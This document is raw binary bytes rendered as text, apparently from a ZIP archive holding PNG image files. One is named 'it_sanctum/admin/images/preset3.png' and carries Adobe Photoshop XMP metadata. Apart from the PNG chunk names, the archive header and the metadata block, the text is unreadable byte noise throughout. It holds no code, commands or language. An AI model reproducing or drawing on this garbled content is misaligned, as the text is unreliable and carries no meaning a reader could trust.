"���X�A�}����	5JZ�Mh�B�r��	j�ʆ���.p�LNN���u�kP𢢔i��h;T'&F�y^��XYs��j�	�</N���ê�;>D���d� ?i5[�s���	&f���
\�4T*�0It���y`���5�F%��;��LM��Ɏ�2[Ք��pH
�}�`�|��g�����i��U�SCCZ�a&�"2/������or&&�fggVh6�l����T�Hll���:��9D.���H�n��B�!::���F����%�e���XY�X�'���68�X���7Z@��YP��8����-Z���]�ϝ�X,���lZ
ufFQ�y����ܻ|��8�:7'��e�L���9�d���D�䤈�5�p0��0w�����I
����Ԟ������O�j�ґ��|�W!��ֻ�h�ѣ�|.t���ǻAq�Z�e�cG�J�ɩ��n��ɢ�L�������C����a�Ii 22cZ[ԊqSS��6EJJ(�'����DZ�Ȉl��8�_]�~��6c/*L^�f��B#�f1%���Y�*s���_��:�⾵so�j[,�f�w�v��fE����y<NAARG��L	F��lMY<�] �ɯ��,[]]OB���xp�$&�÷4��ف���+�Z>.�MZ�I��^*;➑ݝ��8kb!#0�AC������f&&F�\���h�;�?�	��9�@�|:��es[c2�9��3 �X����;��m�
��7J�j0;;ڔ/'�������8�r�<Y�C��D�U�1��A��c����ee����V��*늠�#��ݻs�>�=%9��UA���}{jRR�
�v�N;]Jlv�߉|�,ĺ�g�4��'&L�
U0�5�T����'�Kda����&@�B�'22$4ԏ��AO%\�Se'v��ԏO��	c62R*l�3�<����O�����$�aw(�"1��'��3����P'���3�n����ة)+-���uP&��<p�~�d��ژ��Xju��CH��h0����A@P�7�Isq�\MT��w��;66�u���'�L�	�{zFhxsY�d�6l??/Q�5�%R��q��ŀԔ�$�x�(�@k[۠��5nb&:��w=��{wϰ���7�#�d4-�7EPܑ̀�d�i
�B!/.V�wO^ZZ�W��x�V��af�4�ͤ&k�̈����er�"���nj�Ǎ��CC�\�������!���w�1WdddD��7�a/�4��v� ��l*�p&�!�I��fA1\c�&S���/򺺇��?���ű@QT�<����R��#��%SDE�66��Y6;����2����ޱ�{F��U�QXrf����R���>��b�_�o_>�rd�
AqG|�R9f/��^�O
3-�;�z|�fb��'%���y �̢JO�3���(��������h%g���؉���_��Ccc�T�z�E��9�d��І����:�����D|͸���AqGV��ѣ�33c9-Z��UaA���f�b��
	��Ӝ-i�Q�}��5��9TT��dc'��R�������%��J�ZZ�+C�ZZ.{����E07�:�db���n�j#g��'C3�����������#��ȑ���<8#=�9s�qbB���D���I=�ѡ,�O���h
���􎂥�vh~r=���0���z�%&������x�.y�sy���@#�h��'h��AͽNr��׌�頏x�L
��7x	64�D�)ɑ۝BDn�l�־�XC�Fv���7����f3���y�Mw���}!�������Ϯ-��x9u��b�����r��u�=���O��l_
��aTv��or�X	-�<))��e��Or8,��ܜ���D'|z������&&F���>��F�Te0��Cff,틁��1�V�rH�d0<L��
gGuAGd��9����9�A��mN�=�f������v;:�۹3s5A�~�ÆS��dFPܑ���b>��.g��	+ٞ�cGZaArbb���=`>襯��ٶm� �p�dU*�DZ���2���=''��a^�X&��oц���n���DV�ʊuy<��1p��Bk���=$DT\�%moW��2�#<<čh�K�y�zQ	hWE��??D- ���ש*�;3_|q��v��w�X	u���q����L:M�"���ٝ�L�IRR��x}?>)(��ñ�^N;����6�}i)}�����r�p}_l#"��a-k�I�sԀ)z�Z���iy���w~��
�aAqG6c*�{��~s2���?�x�jF ���$b�Q���={��R����6�\V|>�c����JK3�ݎ��;���q����2����Z�x�w�3y�ٝd�ιs��9gV��z�nҧ��Lj�0jʚ�Iaa��� (�Ⱥq���_��28ħ��,�r��;�iz�pQ��y��?�����R�I�O�|i7+�x������(��cf�ӹZ�h��HO���A=}��s��ݻs++s�5��x�vUd��e��>�`���l�R4�Qܑ
�H�c���<x�����Ģݕ9;v���%PEv�$&������?*���7���;d�;X��R-�;�n�Ą�M<�+-y�J��t��y�C�~���@-0M�&u�dz<�����/UpEPܑ� 5%��5��s�*hK��۔����m���nw0�
�ǥY.�$��BPܑu&66��+�r���Ρu�}~}m�RBB�d��N�:����uZ�_��^_hC&�憅�`�d2����

	�K��������;w;�%��|�w��a0$b�z|�ۮ�m6�s�i�/�;	�ˎ��/��A�rG֙���C����1��������c��?�_�]s�С�F��
FʔT�魌Ǜ��.��VYY��!(�kdr����nZ0Lmm�3/u�xj�Ej
%�F",7��f��!e��5�;�G<8�X��;i�^mr3w�+P��WeB���qG{s˲�
i��nm��!(�[��\��Ǟ��M-RJ��w��ە�۩m���;׀����h��P�U"�VgX�Wp�/�;�F��$.,bG��W75Z�/v�=EI6m���fjN19Ƈ8]�(�P��,Yؒ,��ӫ��4-�sw�mZxe�"�x�P�ɎNj��)���V2Z�I��כ���K�0<g)���=S���ϝFqq��Q�X��;�'TY��/���Q�ի^�8O�z
�8����X�E"�H�û���
AqG�0]/T�ScB��H�n}�7n�ܺ���=�s���u�)0�ϙܜx��
��:��.��u��a�l�%S
_�����ȉ���f��?S�X�D87�5G�n�����9s���pn+
��X:N���n��(��G�j�
&��.�GGuշ��V��岃q4��g�A|��L��|[M
?_��nr�5�/8X��t�av�u��Q*"(�ߑ��`��[9p�B��_z��9u����jW5��ᘥ%�a0n��d�-����*T��3�,xP��e�����~EGISR��{���r�y�}5U�A��#/i)!A���N�NO��V����xPܑu#t���V�:��pθ�~����4����'���������;܅�L�%7."�`���	�t�Sʞ (�Ț"��룯����:*_'�ror��L��$2R��"#B(ִ�㏯�lwD��H��ʒ�d!��!!���*���"$�0C'8X�5�Pܑ��b�6�		�O�+F��w��}��[��2l��9��9
����h��J�ͷ�+���t˝Vu�R:�j޳'�g/�
q*��/���⎬33�o��
ors�x}��Y�`�^���A
��?�&��d<���]���%--�����}9'#�E
Q�8�������q�Y#T�/"6V�����G�4&R�һ�g�!Ab�D!�"��{v�>yd��������w4?�l�Yh��'JFP|AΘL8q�B�ѡl�P:[4V��4��$
�M	��w�_o>9_��e'%F4����f�zB._v��˗�����?�ZY�"�Y�3�E;��)�`�7�Tyث��t:㩓��hbb���[(��C�}h؂������Wuv
�T�S�u�UX��W�zrk�`�%�˿���厬)��ä�mۖ'[lM6{%�|�Pa����|zg��64%%9�o}4))����6&�';r���sx=��{d�*�e����_���O>�ZS��!�Є����.o�{,==���xbb8��A�Y;�!A���Ɔ������ך`ap�P(�JCŶi�L"Z��A���x<6m�m)׿P���{~:W{�~W�|4g^^’;��\.5��l���M�.�|����a "8��q@�[��2�h�wP����f��ݎ;w;�CqG|NVvm�Pjj����9�:�D1(�����5����s�8�֐`-��9:��p����e'��;w�Ie�C-�OJL
���B.�k4���W�6}��g�oYq'���(�(,\7~���8������/��MP�'�>����s�k�mK�_`��M�w=N�]C��檋�%�!/���	̓L&IL��oO���K������w]u5�YCqG|�~��.-�eM@�˃i������i[tT(mM��>����CC��	
��_�E|d0���$$D�@T���VR�F|}�w�������*�K/�޶&�Ӧ����{w$�QQ����Yڒ��Өig����������C����8u�q�Ι35[󮛘0����#�%.N���!U(�:�f�z�(���,~��?x^��j�cN΂��`��������HV�
�}�a~W���Χ��y`}�����#(��fr�� ��8�Rz�ΒYחˤa�ٕO���Z�{o�h{���@	6{���Wk &�Q�⋊Rbc�8��k>��{�f�7�T{�������b�wķ�t���]c$�tq7��+�bv�(�6�J����{���&�>�QnH���40�O�(�.?�h��d��e	ç��Kd4���w��0�l3��#��^M�F9T��0���J��4b��.�#	�ד<|��e���pyp�#oح[>������W��Νۺ�@Pܷ�����(�;�G��O�,��N�)/H
�Xi���e�d8��vrk�.5���'^���ϮQ:��zO�>w(��q8�8���V�7z�gmw�S��v��<MM	I��֏?����{5t�$Aj��	bշ�
��.�|�Nw��W_��q�!�ܺ�����#^C94�!��9��jsnY
,&=�ha(:�%��6z���o��s�k�;�K<�|�;�%S����K�f��l��sp������*��q�]�Xx��rd$=�ha6�yCsicӓ��XYB��<�/��鋋�=�Wrr���c$�=��op��_�����?��9W;�+qwux�)��Hyffl[�`Ŷt�~NN|EE�yʪ�0��O�������߯"�wt(/^z�E�o~y��f�,Ӳ/p�b���
���{�����[&`.0��Au���3Z�%����qq��܄��r��|Z���%P5�����Q�_7���?��HH��
����=��G�;l�TMxw/�����qj4m��̣	��>~��=��4�%��;3�K>����־�)��<���;��|����
0����0?��5^�Q���+W]���ˆ7���0,L�i"������5�(��������<w�g0��#���~����?�~�zs]}�̌}bb�B,��/�ܸ8�J"�����a�r��;�jiQPciI��b1,�.��#��,X����U�ɛ�b��z~��ُ>�b6/;ELg琿�B@V�n�����3W�4B':(���3;�!'0��

��i	X��׋:Xz=2�0��s�SS�
�^���D�O�j�%��qI����j:���i�a�		��p����
��=�0����k���
b��0y��a�v���厬D�>����\��+�)ޘo�^>y�q�;_0�d����:f��%mX6�	
�
&�<s����ϯ-f�77��SR�.��^oz��?��=9���:M�e�"|�P�����n{7�pe���0fi�����
M��C���a�r����ךΜ}�������+##�&���4��l��Y��:1==�ߞ&;I۶���/�'�֮��τ��#�����NH�.js��0C������x�DH�ܐ�G�{�\�;UA��u��Y�iV�ѡk6/�+�<S�֛���w�>|���NZ)i�2c7D}�}��i@BB���վJ��v���h�T*}���&pq�8\����ߗ��a�-�˃�>����5�^�됝�	�h	�=�(j�>��d�,���M��M`�;e�����&P����AUgא�j/��{��_qq
��Ng�b�,w�v}�z�泘��;��lߖ�'՜cc�󃦦�>
�͉���ՙ��)��β̤���Lrڒ�7['���~-�~�ylL�O�;��w�ǽ�y���`���۶m{*--IDD�����QNN�����n���_ܸv�w��w���r���ɧW?��ʚY�r��y�J�B��g�_����z�~��f��&�fdļ�~��S�wЖ�|]J�Gh5|vP��f\3�R͏�E�G�ks$.�V0�ivv��ϯww������sԸ��x��R"���޶-�o}�Sl��G5E"ޑ'�i���z#�6/��˯r�!(���]�B���5�܅B^h(=fF�\v�����ޛ�j�qz�g{O�(���?�+�����-�����<��K���I��AqG֍��Ċ�,��\��L�w�y���d�5��jg����HF�o �n��+�y�A�9�k`�����چt^�(I��ks�]3�&==:(Hp�m���陯��*
�Ή�̌�P���2�&11�ACm�*--zYۉ�
}��
�:gM��nw|�����������D�\jr���Z=!�m0C855*00�.mb�{��«෴�*<=kd���,�iJ�&����6G,�{���r��b��'.wSB!$�]�#l6{X��Æd��KM]�כr�u�������>|�61���47�]f1����$"j?�,4?Γ���i�Rwψw��"�wd�p8��׮�GVV��̺�;�q	
��g}�Xg!�Ih9�wd�����9��d�;�͗wP$��d��UȩIt�f!(�_���wOޒÀ���Xe�ϧ{-�0����2X�I�;���|�61-�񈌔&'Gd���**��ە��Q�R��8��&�:(z:<���󮊬����g077���oewLL�'g�-��t_��
f! (�O�Ɏ߻7�y�t�5����n"���<�p���=��X���Һ` ��~צwPv�)�K��6�H�;�4R��g�<\9==^��=�	SrR�);AYYM�H�L�,ش�p��m�ŋ�Ɔ���֥�7�6��}�$X�W
����[�"ڑ�R�$��}{{Y1��=#~8��?�9��M��"(���a�e�8v�;UA[22�{�f������Ë�}v��n�h�S#�QS�p6���d���`�⎸�f���tm���JE�J���{�'k�zbɉ�d3p�Z�'�!��I�,��W���vjoW��UE|��7u�=�veo��MK��Y�Y}�ma5b
�� �D"��!R��a2@�����Yqm�J��k65�3��`2x\vJJ�Z&D�r�N��XQ���n$�ي�:P�?brr��^��ލ��{��� 1���:�?fx)=��v�B=uI�<��w�Kep�1�/�P����nw��?6����E.����V�e��L�[f��p�|�Ow��=�E7w�����g��!� 0`]��BU=4m�c%�(�����t�|�{�_���A�p�`Vȍ�ؘ~�jK�LP�KMM�w���P�e���

	�d��D���B!6i��V��7�8�x���x�m��O�x���c��L&��<���^�*��ZZ�Nd�n�
ɝ�#��W_��]�J�BM�����ʌM�^�h��I�����tF���gf�2sygӘFff,�k|�����~v����;�������K����`0֧�=��>�b��]^nn|o�шwd�P�s�]�}�8�@��]%6�<�����}f����kMn��_��_�>����K/�^��|��hiQX��v��3�Tj�w���0���ُ����?_������*�&�7��`<<���x���sr���lM���ԙ��)QO?����z}_�k�
*��S֙�>�,�(
�G��X,�f�@8�S�+�����:vt��v�&��+W=���Kv�wd�dgǹ� �_{m���M�y	�ѡ�r^T��o��S;ȏ���~WQQ��g%��z�\�����	'�.��^@�;;��ڕ
�j�.�劻�y��e�����#> T�u�!���O�*_�S����f��<ҡa��>����`���|�1N��Wџ|z���9��^��Ќ���uv����,0��"k�_	����G�����)�Ӯ=�<�|g&���UAV�P��.�c�?�w���2�'ns��6��=��2��;J�v�\�\��=y�֔�(��������q�ᾣOn�~�R<�Y���=��/��A]��s_zq�*7��>��9��=��P$��d����C(��]]���#~�D"����<�z��n�âB;���?�xtP�ռ.UU�w�v����C+����w�u��(��w����z�zKG��ٻp5�R=����-	

2��?��E|�P����<k+({�\ �<��6���		r�p��gD�o����}_��^�)��R(T�&'�ܬ&�b��y�;�n�j�_�UN3%9�Vu9ڼ�2Ǔ�|�a�|σ�2�AqGV�H�ۿ���c_��46�����66�s�R����xk�
��˯n�&��/��{�5F���;��T��nVKO�	�K�c����D�Z��w����\&�ɉ//ς#S}I$OR��Vo�lǻ��>\.���8"�)k4������Ĥi+\�kךi��������~������S�!x�̓`V{�����4��j������H�tA����-W�>����s�oKٽ;7`��߻�?k�=}������Z=�כ��CqG|��x�2B��J��̮����Uq��g7��o�~�yM��dz-X��m�k'e�����B�'�7Ay��[ZnJ������`����C�A���U{O�����g�x�9/?���5�&))���O�;�C
�RS�K
L���d@�o�j�(��|��b���mn�e��ʊ;�t)!⣣�����1=����`#�d����)���f�ܙ��L�ӯ]���W~�w�³33�U���=n"[R�#,t�Ein��P�܋�S�<�p���t���pT��
���oCC��׸?�Hć����o~��4��m�}��#u��ʕF�Y�#}s\h�@X���
�s�cYYƁ�����~�E�x��S�X�����}#Ϲs���"�E.~���K*;�ꗯ4��{$%E$&����4H�d����p�V�h_``੓�1�G�����b�+�rٞ��d�P�������z�׿,tDq���V�%c�<��ݎM �#�����<�]l��e���?�f�b]�� �����7}|��*�3��w�	9�R��k��[2i����/�8���$m�؉����NZQ'�5�T��@���7hʞ����i�TP����ع8��Ԩ��`_��;���Y�����=~觃�
/��b���]9����(��B�Z,o^}eoSS�Fk����?�1�!���:����Aٗ���ʹupH����I����(jh����%d�`�jD�WN���}7==��*<?Gj��8��E���b��;�g?�	y0Q�����*V��j��mj���r�fvVܑ#�h��ᰎ+54�33����JJ��܄R]]�����쉲��tє���
��86�]���%�4�,�)kWװ� '��}�]��	7o�^�����,K�i��?�����AqG���+��ÿ��??���I�B��=��ŲD�uRR�� `���~�D�,(H�W�|N��'��W�9{��P ��C+��@�r�P��==#?��Gf�Y����C����yo�ٟ
�V�ʌ=yr���X��O7\ҎΡ�hI�%w�O!��l&t�&K~^bĺV[�]���і��φ�^޹3�p^�	n�j�|�U��Wv�y�h i���^�(%�,��6c��
�q���}ppa�Q�"�9GF��e����gʲ)9����}~�9�LJJ�
�04-_~y�_`1�l2�;���/���g��޽���Sss�-;�4*Š��<.2R�m[*5�BCC_uu۸f2(�����8Ի�:f&4'��dY(�+�j�@�A�ݏ
��ZL�����˛KIT��Tv�)�^m��?��'?�ce';@��!N�:�	K衸#~-WIMM��<���8e-�ƍ�����ЕlO�ֈ#��_���R�	ɛo�d��Jp�G�ݑ#�W�556�MLLy�1h��]k
	����A�p؆�)��{��/\�sY���0��2kqPa;]�{5��져#�Ɠ4�>�솃E��`0FGuf�tbb������֭�vUd2IfFLNNBh�1����DZ���cGK���`wwu�
fh�V��\޸�B��nw����.FD_���.k�D>謸�$'G��?3c���Ґ?�ǟ\			���v��Cw�.�5$X�|0QܑU_Jjvv����x��TtT(����7z�cg�x�B�V�����1 ��i��f�?�#'��ݓ���Bԭ�x������N�B}�dyU��VMK��ߺ՚���2��f�ڗ^��.*������G�+��K�$54�t��h�����VV��c��[��͔�
���Xm`s/�����Y�[:�V�mtL��5<99E(;���څ����*�P��Y���;��{��Y�����o���ګ�V����?�w�w7
���m��e!s~ݹ�%�7g��TV�@�A��hiQ���^_�(����DZ�0g

�(X���<6�K@◛���@e_̽�N�U���߯�w���0�ٝ��`p׶���3�d��Tt�@��c%))�Ε4FF��~w�g¶}�������F��e����zt�ŦRO��i����V����,Š�����˿q���{�x��%�1�	�d2�eח��i�1Bʠ+��Mu=���E��XK�Nx	���t0���{q�(�e�
�s��ή!������'[�.��#IDZ3!!��Ҍ��um6��u��=T�(�'1��t��Z����2MfK�v��H����1���ԟ�� �pY@��yF_~u�o~y�X��6��-���x99	���˗�a� �|>�n��X����)��`4���eڧi�m�<m2Y�̓m��L���_س'��
�����2�
F���ߟ�rY��,Vb��w�:m�ɉ��J�cG�͛���l)���~�WaK�ј���O�V�)��죏����CEn�u@n�ʦ�P�A�F+��Pi4�1��Y7]&�r�D�SY���5�<�HLr�Z��w��m䔢­�L*��Ʀ>Z
�ܜ�'�(>}��t�р>�.��[7>���?�%��Jéid~���p0��??G|���\��-wd��v6ዊR��=&&�c�;h΄ݕ9!!�z������.)�(�_����N�(#>�r}�M54�]%p�܃+
�߻�I-~t}a�gYC,�Տa���+!!��"ktLw�|����y��kx���Ǐ�Pfr�����n�ܿ��NZj�/좮p�Z�s�N;t����%Qܑ�
H�K/�^o�L�~l
T5%9�c~ l�⢔9?�⃄J�x���da�;3��{���o�;;�~�����$|>722$2"$8X�d1��Ȉ��k�n�V`&KC�V�_`�z���k�?��
�R�%�3'v����ky�X98>���a�3d2Y���SSֆ�>�]�x��⩩Qb1������ryW�0�B�A<>��0�`Z�}{�r�dWE�����ɩ+W��i�33cIe�PU�Ң�r�d8
h�챱�����P1���i.�\o	�����3S��T+Ov�nO��$XR+��
�	�dž[ew�w������U.~��}+p�Wd�5F��?�R��.K`�����%!*;�;����G1���܄�Vbb���n�l�q�����R�#��B���T����LIy\7����ao��?`���AoW���n�vk�fgW84* �A"�L&��6��c�y� ��R(�z�A.�k����+��
����Z2w�K�2ck‰t�pY��5nV�J�P�Qܑ�Op���R ė/7�\��{�摕���N룙���1��O:d���R��e���&ib�Y,�)�IRS�n�n���~���H����u�,�2��d�����\�XDEI�be �R�����oۖRS�E]H��Z1r���%�S0�_J��0�^orn�w���Z��۩�A+o�j�U��'о�_�M��g�_��~\�L�u����Y�l{����q�T'��q2r��yz�C�Y���ψ�3�$��4�3���O��VS�"�!!�py�L.�����~�t����ЊPk���\ͥ�X����N�����'�5���9�u�w�1W�6�|v�7XW�}�J��lu�h��/T���_|y�T���ZKɏ7R�"�
hz\��� )!A�f/q�*����l~:W�ԣl�F`ll9�	F.�{OϨF3���СA$�i�P>>��ʂC�`ڿ�ʾ?�w��䓫o�}x�W{���'��s{X�Z�%�!(���0ykS�h?��70�r�ׂ����Jȏ�|z�&�۶���L�������ԔHϵ�S��}���Ӣ/T�����DE�H��x��"t�n�Ѭ��&���	��^ӋI?�s�C�2礤DQ�5����tߓ)K�����dq�uzQ���ٰ01*;�;�FP�Wa�9.]j�Wӹ��UTd�ݓG~����i�/']+��sC�,����ܜ��6���2F`0��_���.S[�~��IA+"t}1��Ԕ,}��b���
��.�P;+��ݠz%��Vv���Ƹ�4���'�Y#��<���c�#�
��e�	�
�4}|���n�SW(,LJI�v�I��x�zyy������>������8g4[���b��x��OL����k�Fh;U�љ�|�
��Z�d��eoc�qX�11`#ǭx�����7�8���ߟ�|�V�.`.��(55��(����3�8�/]8��7�=M�_��ӫǎ�xw��lj��I(����5��	�w�vh�j���ݡ��O.�(��O"n���[�~_��ʦ%�!�������\(;ͬ�
TׇT���bg��[o�vVN��?8��������#�xˏVW������+�� h�#�0�W�������꒟���Lr`�L��ˋ����I�����1�к����D-��8~���Kz{G���ؘ0�I�
�XLb��'f�NO���v�cv�� �/�/��͢M �5�;�n�hQ��@�RO,����APܑ����V��=))�w��O<]Fz$���˛�y����B�璗�0��߹�N]�VO�������q��V��F�*�v�d�
��C30�b�sV:�i�����Ez��v�H���e��yAqG�2,}Y�?L��~�d9�&��U��7��5�\vrR�@��	��'��<P�٩�,t>FG��t�c�͘<�[�X���X���ӣ�?AqGև����Q.����Ƅ�����lrr�H�s^*���!!A|>���v��嵏��˕�/[q�����u�zr�d�`�`Ď��:�49���<S�'31ab�Y�d��V��oo���$m���%k�.�^o�����?�;��Nۿ�ۏ��(��s`����xș����I�X���Y,���U�ɿ��p�҃�X��\���qx|�;�%�(b2*t_��m��Q?/7!::t5�i�;���nnX�<\���N����}�ɕ�
XLL"�6�[f��ѡ��β����e�Ԅ���߸ٺ��~`ALtXWאFk4OY��6��>;��`��b`���|�>W �	\Ἳ	���YMe>���v��h���m��>��W����"*;�;��T�n�}뭃k�S4a�F%�{��k[��add��o�kך��h���l3��-̽�N�U@�s<�5
6�Z�4<<x||R������1�ӣ�&�~w��~�XAA҉�K�3H����U�1�.546���NO>�ӹV�}���5�nw��˴9bsɄ9���'##B���72̕�9qq2��P�W���s�f���Bڒ��V�3<��J����;��(f��aab2U�:�-|X0_'�?�2���1��B�?�S"#�m�����3��2��G�46���.ԟ>S&mKˀ�h���/�O�=J�'�^�h.��f���2d2ɝ���MZ�]�V[{�rGI������⎬'��#�z
u_�(����Ҙ-ӊռZ���/��&$����� ~|�����v�
:���'�՛�Ӄ��amVV�r�Ⱦ���|t�M��P��Q��MHomU�o�:�ɢVM0����e����*B�:�I����L�<��0y�v/��B�a�jgoD�z��=�Nw�h�X�����}084���FG��ĄACx����{�m���!�sG�
��D��1�����gj�5�;� _���b��
J�A��??�f�>�:svi���2��=���m�s��1#=fY>�Ʀ����u��~xx	G��ع��Hi�����e�[�ʯ��wdkQS�馘ܦ��{���O�rY���{dY����{���ܯ�p��l��jEy����ʆs7�?�_Ϟ:U�� �;�+~<}oK�o[� ڵ���G�I�{zF���H6��a�+W��_8s���FGu�+(� �X��ܿ�����M����ɟ�U�;�fgg7��H/��w�|�y>����&�������<���(�����ΥE$���Й0���s�Fdd�ؘދ�e@�����)��A��_�P�gƹJѦ$>N0���hx-v�`�/�F��B�{Y^r�#���8KJ�LL1
���ͲXL�O��X�kj��懑�[ǼX�sG�Fo����������am��^Mg뼺q�,�}���<@j�b�fی=9)�����35uu=�ѡd�eh��<M.�X�a0���b��l���/�ML��7*K�n�#D"~aA��ˑC��$����㏧����!RQX�X"�����-`^�kj:���}v-.N�sgfjJ\���'�9&����T\�һ?��;�IK�>r�����L�\@��;:�����}��eo��.��t�C�Y��.�����t�y���)��L+d�r��+A�A\@LƉ�Q�{!+Vk� �@�ÙLhP��,ZFu�cvdD"��"�%33���uKC{����nS(�~����>�\�v�����~�溜
SXL&�o�;�Fdf��v���]E&�R/w(�'�_~u38X)
�M��a��0e0�9VRRDp�hb¤��Ts.��()�>�ÆM*�g������$��U@�e�p{��Z���iG�����x������5T��	��WO�5Z��_�y���dϜ(kn�t�a]���f�$$���$�Hxw��A�����YM)m����������w� ^}����ܙ��B���+�P�
���$56VVW�M��Yc�Y否�y�޽�`�0""df�^U���}0$X(���SS�l��+WZ�a�5�@�s����UQZ�A\ÎE�w�~���.��Y��#�8wdih٩�
����wNX�8$DD������7��+Zܫ�|�8��ٳ����������FMA��/Ȭ{�l�Νvx��������]��i�k�����ݕ9/��+';@w�W-HZk��PkD��L���jS9���1IIٗ/7P����{^^�������,��`�{R7���"����+;�#O��xrwψsfc_0�?F\�'J����x���)����&�^o"��h��u���T�߽�q�������+W=��><�9��}�F�;W;�^�CW�ήa�޸^�wxX;:�[���'?��
����y��#�Q
���b��Vk���j����q�Ҡ����UxH����2�zu�?�.��W�g����↯c��A�##���"h&��u�����0��h4�?�m�P.VnA�������m�f�����4����y�$ć?��N��/�f����~��C=�…z�?11����Sa�☘�c�['}��l�l�lE(��H�IN�N����n����Tu�4{WyT/=���!ݻ,�Q(Էo���x�'�]=����ۛ�a�ZihЛoHN� �mQ�IL[�_��	.���;�����i�ښ�����(B������14TL��ht十8l��d�^�ڔ�%�,���
�+��G]}Ϲs��~AqG���Ɉ�.~��{ŀ���,��*�_]���ޮ$��ħ�E?VB|L��3�c�h>�j�_���<��w�^�+C���/n����3X��P�rLO�0���7ZT*�&8�'9���~�b���'��?��j?%���f��ƄA��㓋վ��]HI��~aw�l3:����F``��y����9��9�`NMY���%5%J,�]ՕEP��{wψv�L�i�ʊ��u�����<S��v�ٳ�j�a0��> 0@98~�B��3�j�}��T봍T=�j"X",)I��œ0!�Ѳ�$��Jo�la���AO���h2y\�ڌN#��ndc6{rr�K�LH�0,T������fW�}���ꂾ4!�rK?�x����0���s!&����(
�}xg�;�8A6�s����VC!d�ʎ��#�܀ݹ3�L[� �;�Iؾ�1_�"�FT���Ȉ�x�f��l�꫏�I�/Z�2�L&��ٻ�`��Wk�{8fJ�c9B � `��4�+�a�َ���[Ḗw�q@�wq@�w�qwG ��;��� ���� ��;� ��;��� ��;�� ��;����;��� ��;� ��;��� ���� ��;����;��� ��;�� ��;��� ���� ��;� ��;��� ��;�� ��;����;IF�}��2�IEND�B`�PK!F��ט]�]#it_sanctum/admin/images/preset3.pngnu&1i��PNG


IHDR�����tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:E83E991A858B11E69593C6F255096AE0" xmpMM:DocumentID="xmp.did:E83E991B858B11E69593C6F255096AE0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E83E9918858B11E69593C6F255096AE0" stRef:documentID="xmp.did:E83E9919858B11E69593C6F255096AE0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>E��<ZIDATx��\�����,�DTT�{�Qm���]��a����u�o���v��i[[[�V��=�"�� "2�?���7		�@������{��y�s��<D�W���	M��� ��;���� ��;���� ��;����� ��;����� ��;��� � ��;��� � ��;��� ��;�;��� ��;�;��� ��;���� ��;���� ��;����� ��;����� ��;��� � ��;��� � ��;��� ��;�;��6��hhq:�m�0�d��r��@Q��dl���t��r�(�w�D�[��y�O� �;���+-�;;�b�ghq:ba>�m=����Ϋ�� ��"�TI%��)�5=�N��\晔J� �|�2@Ƞ��R�SoR��)Ľ�A��Y/N�'�cuw<BDD�O
 �@'�߷�Ʉ���h��/�JE�=n�;Z	�rz�22�`�lRϿ��ݏ��]ط�r��F���RӼ���W��b���h��z�h=�R�7ޣ�9��$�����&~�:���� �T�ŽMb~n�_N�,;}�\S-���.�BA�Tq��bF�G�m^�/�m@�nsF��J���?~�l����r����
v�|G��ǭ��ϙ�y�����}������a�k�X�N;��O�_E`�*4��#5W�"�;kx�I��Jq�R{��_J&tSq�TqV6���k��|E���!n�`��כ9��אѱ�W�c�
o?��m�ua2ϩУ�d��y��t�O�5��5�a���7Șx�T8�e��u�6{�k���l��M��w2h6���4<��!�4]s���#�~G���{w����~��{�t���z�kyz������fэDD�x�Pطӻ�:���>'�����_�0��{���X�KN���HJ,>a����q�O_�y� �z�aڻ#��$�#�̡��nVϻ~O,w��U��<���[�܋�&J�ņמ�9s�/"<���������4z��<2���jǤ� �}3��|����{_�wo���Y��`�N�2�~�N��i��w��A�OQ��ƶsR
��p0�7�Qꅋ��hEIg��0��n��]�8�߶�n�^4갳��</�s���ON�Te(���A#8w�Q����E$v���8E\��"��x�x��b�M�,����ֽu����BNv��O?~�u�o���)���}8�n%�!�;�➜�T=��˵5m�6~���a53�g��*���ͫn�7?zC��.�����p{ �@��mZ�҇-�׵�A�d�y�ԋ���)9$�*�e���g�6Wd��*�=�^p%3~���Ϳ}ײ�
��s+�Tj���K�,w��TIowI�E�x��h[)ħO6���);g���˹�+�+��C�QkT% Y
�;��`��Q_z
�C=�r�;/��aj.��<Rx"<R*+�I%E6/ջ�v�]�Vv�k��ӭ��������?l���f���;�%��x��:�� �dr��K�~����Go�P5F.?{G}��촹m<f�,�Q���L�A�˰%f�N!�o<�o*� �@�*���M�ߵ�7��������Ð�O���`gȸD�O˜Y�n��3.���ݗVIR��� ��N�U.���[������#�����#�wi����*�Pv��\��z��I�	}8��x\'(
O{���;�Oewu8�Mh�����x�����H b�G�h�D��]8��߳5Hk���')���2����m��Vs�UdJ/��Vn�����ѱDD�x`��o���N""��O[���3�S'�ư}�ag^���2z�(�f�z��I���*�1���`�`���q��eAP�]�L�I���k�/�J��+���4:
Tt�PYT
�x�4�=5(L�>�?o��K�D�z�"*�M�`�?�?y+��v��q�4����B
��1d�k����I�eDX8^P��O!���Z����P�Y��l�Go�kQYVbg�'���O�Cb�DW�����#b�p�������;`�Q�Eܑ}͌�h���f�w�c/[*`xB*-nx����λ$���J��䊳���܋m+���҆g��5��}�+��
y��75�a�� �$DeG&����q���lZ�����j�d��L�EX-Ă#��/&c�~��W:�ސ	I̤��f�(�	8�X0�NP�S���U�� $��x7gN7."ļ�̸���M�~���$��%2r��Gs�3���s]E?�*2�ߺ^*?��f^����L��	Z��'�����@�DD�<0�I*�� Iz씦Ʉw�Z,�7����',�T�k��U���ADF�9�N�����n�8�GYa�	f�x�_���h��J�cU%Pvw����ɩ�{w��Evw��@>h698�'^|D��"���\S�F����M'��4^����Č���w9���>+u�mpP��
